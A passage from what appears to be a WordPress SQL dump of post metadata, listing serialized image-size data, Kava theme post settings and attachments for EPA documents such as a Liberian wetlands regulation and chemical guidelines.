ze\";i:75013;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"today-news-300x181.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14416;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"today-news-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6938;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"today-news-768x463.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58949;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"today-news-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22454;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:22:\"today-news-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5100;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:23:\"today-news-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12760;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:23:\"today-news-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29021;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:23:\"today-news-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30451;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:23:\"today-news-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44855;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:23:\"today-news-600x362.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:362;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40826;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:23:\"today-news-640x551.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59026;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38557,5778,'_thumbnail_id','5780'),(38558,5778,'_edit_last','38'),(38559,5778,'kava_extra_enable_breadcrumbs','inherit'),(38560,5778,'post_formats',''),(38561,5778,'gallery_tab',''),(38562,5778,'kava_extra_gallery_images',''),(38563,5778,'link_tab',''),(38564,5778,'kava_extra_link',''),(38565,5778,'kava_extra_link_target','_blank'),(38566,5778,'quote_tab',''),(38567,5778,'kava_extra_quote_text',''),(38568,5778,'kava_extra_quote_cite',''),(38569,5778,'audio_tab',''),(38570,5778,'kava_extra_audio',''),(38571,5778,'kava_extra_audio_loop','false'),(38572,5778,'kava_extra_audio_autoplay','false'),(38573,5778,'kava_extra_audio_preload','false'),(38574,5778,'video_tab',''),(38575,5778,'kava_extra_video_type','library'),(38576,5778,'kava_extra_video_library',''),(38577,5778,'kava_extra_video_external',''),(38578,5778,'kava_extra_video_poster',''),(38579,5778,'kava_extra_video_width','770'),(38580,5778,'kava_extra_video_height','480'),(38581,5778,'kava_extra_video_loop','false'),(38582,5778,'kava_extra_video_autoplay','false'),(38583,5778,'kava_extra_video_preload','false'),(38715,5819,'_wp_attached_file','2026/03/today-new.jpg'),(38716,5819,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:21:\"2026/03/today-new.jpg\";s:8:\"filesize\";i:239986;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"today-new-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20805;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"today-new-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154244;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"today-new-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8261;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"today-new-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97197;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"today-new-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:289895;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"today-new-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28781;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"today-new-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5822;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"today-new-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16255;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"today-new-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41082;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"today-new-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45387;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"today-new-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62444;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:22:\"today-new-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156892;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:23:\"today-new-1600x1080.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:320036;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"today-new-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65314;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"today-new-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87762;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:22:\"today-new-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161378;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38720,5816,'_edit_last','38'),(38719,5816,'_thumbnail_id','5819'),(38748,5821,'_edit_lock','1773133712:38'),(38723,5816,'kava_extra_enable_breadcrumbs','inherit'),(38724,5816,'post_formats',''),(38725,5816,'gallery_tab',''),(38726,5816,'kava_extra_gallery_images',''),(38727,5816,'link_tab',''),(38728,5816,'kava_extra_link',''),(38729,5816,'kava_extra_link_target','_blank'),(38730,5816,'quote_tab',''),(38731,5816,'kava_extra_quote_text',''),(38732,5816,'kava_extra_quote_cite',''),(38733,5816,'audio_tab',''),(38734,5816,'kava_extra_audio',''),(38735,5816,'kava_extra_audio_loop','false'),(38736,5816,'kava_extra_audio_autoplay','false'),(38737,5816,'kava_extra_audio_preload','false'),(38738,5816,'video_tab',''),(38739,5816,'kava_extra_video_type','library'),(38740,5816,'kava_extra_video_library',''),(38741,5816,'kava_extra_video_external',''),(38742,5816,'kava_extra_video_poster',''),(38743,5816,'kava_extra_video_width','770'),(38744,5816,'kava_extra_video_height','480'),(38745,5816,'kava_extra_video_loop','false'),(38746,5816,'kava_extra_video_autoplay','false'),(38747,5816,'kava_extra_video_preload','false'),(38749,5821,'_last_editor_used_jetpack','block-editor'),(38750,5822,'_wp_attached_file','2026/03/today-1.jpg'),(38751,5822,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:19:\"2026/03/today-1.jpg\";s:8:\"filesize\";i:302570;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"today-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23503;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"today-1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180969;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"today-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9095;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"today-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112703;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"today-1-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:343295;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"today-1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32528;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:18:\"today-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6320;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:19:\"today-1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18070;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:19:\"today-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45575;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:19:\"today-1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50424;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:19:\"today-1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71560;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:20:\"today-1-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:182696;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:21:\"today-1-1600x1080.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:378082;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:19:\"today-1-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75634;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:19:\"today-1-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97623;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:20:\"today-1-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192112;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38785,5824,'_edit_last','38'),(38755,5821,'_edit_last','38'),(38754,5821,'_thumbnail_id','5822'),(38758,5821,'kava_extra_enable_breadcrumbs','inherit'),(38759,5821,'post_formats',''),(38760,5821,'gallery_tab',''),(38761,5821,'kava_extra_gallery_images',''),(38762,5821,'link_tab',''),(38763,5821,'kava_extra_link',''),(38764,5821,'kava_extra_link_target','_blank'),(38765,5821,'quote_tab',''),(38766,5821,'kava_extra_quote_text',''),(38767,5821,'kava_extra_quote_cite',''),(38768,5821,'audio_tab',''),(38769,5821,'kava_extra_audio',''),(38770,5821,'kava_extra_audio_loop','false'),(38771,5821,'kava_extra_audio_autoplay','false'),(38772,5821,'kava_extra_audio_preload','false'),(38773,5821,'video_tab',''),(38774,5821,'kava_extra_video_type','library'),(38775,5821,'kava_extra_video_library',''),(38776,5821,'kava_extra_video_external',''),(38777,5821,'kava_extra_video_poster',''),(38778,5821,'kava_extra_video_width','770'),(38779,5821,'kava_extra_video_height','480'),(38780,5821,'kava_extra_video_loop','false'),(38781,5821,'kava_extra_video_autoplay','false'),(38782,5821,'kava_extra_video_preload','false'),(38786,5825,'_wp_attached_file','2026/03/Final-Validated-Wetlands-Regulation-2024-1.pdf'),(38787,5825,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:668212;}'),(38788,5826,'_wp_attached_file','2026/03/Screenshot-2026-03-17-at-12.16.10.png'),(38789,5826,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1070;s:6:\"height\";i:1490;s:4:\"file\";s:45:\"2026/03/Screenshot-2026-03-17-at-12.16.10.png\";s:8:\"filesize\";i:221088;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.16.10-215x300.png\";s:5:\"width\";i:215;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17206;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-17-at-12.16.10-735x1024.png\";s:5:\"width\";i:735;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:121212;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.16.10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7889;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-17-at-12.16.10-768x1069.png\";s:5:\"width\";i:768;s:6:\"height\";i:1069;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128663;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.16.10-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14802;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-03-17-at-12.16.10-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3681;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.16.10-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16442;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.16.10-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39616;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.16.10-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41350;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.16.10-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33794;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-17-at-12.16.10-1070x650.png\";s:5:\"width\";i:1070;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34496;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-17-at-12.16.10-1070x1080.png\";s:5:\"width\";i:1070;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:144583;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.16.10-600x836.png\";s:5:\"width\";i:600;s:6:\"height\";i:836;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87564;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.16.10-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:81697;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-17-at-12.16.10-1070x640.png\";s:5:\"width\";i:1070;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34432;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38790,5824,'_wp_page_template','default'),(38791,5824,'download_link',''),(38792,5824,'by','EPA'),(38793,5824,'year','December 2024'),(38794,5824,'_pods_document_cover_image','a:1:{i:0;i:5826;}'),(38798,5824,'document_cover_image','5826'),(38796,5824,'_pods_attached_document','a:1:{i:0;i:5825;}'),(38799,5824,'attached_document','5825'),(38800,5828,'_last_editor_used_jetpack','classic-editor'),(38801,5828,'_edit_lock','1773835117:38'),(38802,5828,'_edit_last','38'),(38803,5829,'_wp_attached_file','2026/03/Final-Revised-Chemical-guidelines-of-Liberia-2024-1.pdf'),(38804,5829,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:619818;}'),(38805,5830,'_wp_attached_file','2026/03/Screenshot-2026-03-17-at-12.40.06.png'),(38806,5830,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1220;s:6:\"height\";i:1504;s:4:\"file\";s:45:\"2026/03/Screenshot-2026-03-17-at-12.40.06.png\";s:8:\"filesize\";i:206744;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-243x300.png\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22311;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-17-at-12.40.06-831x1024.png\";s:5:\"width\";i:831;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:133921;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9731;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-768x947.png\";s:5:\"width\";i:768;s:6:\"height\";i:947;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119226;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20980;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-03-17-at-12.40.06-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5153;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19528;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43661;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47245;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41449;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-17-at-12.40.06-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79188;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-17-at-12.40.06-1220x1080.png\";s:5:\"width\";i:1220;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:103546;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-600x740.png\";s:5:\"width\";i:600;s:6:\"height\";i:740;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:82963;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-17-at-12.40.06-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:85795;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-17-at-12.40.06-1220x640.png\";s:5:\"width\";i:1220;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37587;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38807,5828,'_wp_page_template','default'),(38808,5828,'download_link',''),(38809,5828,'by','EPA'),(38810,5828,'year','December 5, 2024'),(38811,5828,'_pods_document_cover_image','a:1:{i:0;i:5830;}'),(38821,5828,'document_cover_image','5830'),(38813,5828,'_pods_attached_document','a:1:{i:0;i:5829;}'),(38822,5828,'attached_document','5829'),(38854,5844,'_edit_lock','1774575668:38'),(38825,5833,'_last_editor_used_jetpack','classic-editor'),(38826,5833,'_edit_lock','1774339562:38'),(38827,5833,'_edit_last','38'),(38828,5834,'_wp_attached_file','2026/03/Screenshot-2026-03-19-at-10.53.29.png'),(38829,5834,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2160;s:6:\"height\";i:1420;s:4:\"file\";s:45:\"2026/03/Screenshot-2026-03-19-at-10.53.29.png\";s:8:\"filesize\";i:3918521;s:5:\"sizes\";a:17:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-19-at-10.53.29-300x197.png\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77245;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-19-at-10.53.29-1024x673.png\";s:5:\"width\";i:1024;s:6:\"height\";i:673;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:835059;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-19-at-10.53.29-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31586;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-19-at-10.53.29-768x505.png\";s:5:\"width\";i:768;s:6:\"height\";i:505;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:488978;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1536x1010.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1010;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1689935;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-2048x1346.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1346;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2689292;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-19-at-10.53.29-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:129799;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-03-19-at-10.53.29-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18501;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-19-at-10.53.29-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:72806;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-19-at-10.53.29-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:216788;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-19-at-10.53.29-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:238060;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03